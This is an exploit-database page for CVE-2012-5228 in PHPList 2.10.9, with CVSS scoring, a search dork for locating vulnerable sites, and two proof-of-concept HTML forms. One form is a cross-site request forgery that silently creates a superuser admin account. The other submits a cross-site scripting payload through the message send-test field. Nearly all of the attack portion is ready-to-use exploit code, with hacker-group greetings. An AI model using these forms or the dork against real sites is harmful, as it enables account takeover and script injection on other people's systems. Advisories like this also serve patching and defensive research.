Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
PHPList 2.10.9 Cross Site Request Forgery & Cross Site Scripting
2012-01-27 / 2012-10-04
Credit:
Cyber-Crystal
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2012-5228
CWE:
CWE-79
CWE-352
Dork:
inurl:\"powered by phplist - version 2.10.9\"
CVSS Base Score:
4.3/10
Impact Subscore:
2.9/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
None
Integrity impact:
Partial
Availability impact:
None
+-------------------------------------------------------------------------+ # Exploit Title : phplist - version 2.10.9 CSRF/XSS Vulnerability # version : 2.10.9 # Author : Cyber-Crystal # Date : n/a # Dork : inurl:"powered by phplist - version 2.10.9" # Software Link : http://www.phplist.com/ +-------------------------------------------------------------------------+ +---+[CSRF Add Admin Acuonnt by Cyber-Crystal]+---+ <html> <title>[#] Exploit [#]</title> <body> <form method="POST" name="form2" action="http://localhost/lists/admin/?page=admin&start="> <input type="hidden" name="id" value="0"/> <input type="hidden" name="loginname" value="root"/> <input type="hidden" name="email" value="ss@ss.com"/> <input type="hidden" name="password" value="toor"/> <input type="hidden" name="superuser" value="1"/> <input type="hidden" name="disabled" value=""/> <input type="hidden" name="cbattribute[]" value="1"/> <input type="hidden" name="attribute[1]" value="Checked"/> <input type="hidden" name="change" value="Save Changes"/> <input type="submit" value="exploit" /> </form> </body> </html> +---+[XSS Send post ]+---+ <html> <title>[#] Exploit [#]</title> <body> <form method=post action="http://localhost/lists/admin/?page=send&id=1&tab=Format" name="sendmessageform"> <input type=hidden name="workaround_fck_bug" value="1"> <input type=hidden name="htmlformatted" value="auto"> <input type=submit name=sendtest value="Exploit"> <input type=text name="testtarget" size=40 value='[XSS HERE]'> <input type=hidden name=id value=7> <input type=hidden name=status value="draft"> <input type=hidden name=expand value="0"> </form> </body> </html> #-----------------------------------# | by Cyber-Crystal | | | | Mail : Cyb3r.Crystal@Gmail.com | | Home // www.v4-team.com/cc | | | #-----------------------------------# Greetz 2 : Secure-x41 | Fox Hacker | Or4nG.M4n | SadHacker | Mr.Black | Red Virus | aBu.HaLiL501 | T7 | Sniper_IRaq || # All Man 0_0 # the End
References:
http://www.phplist.com/
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top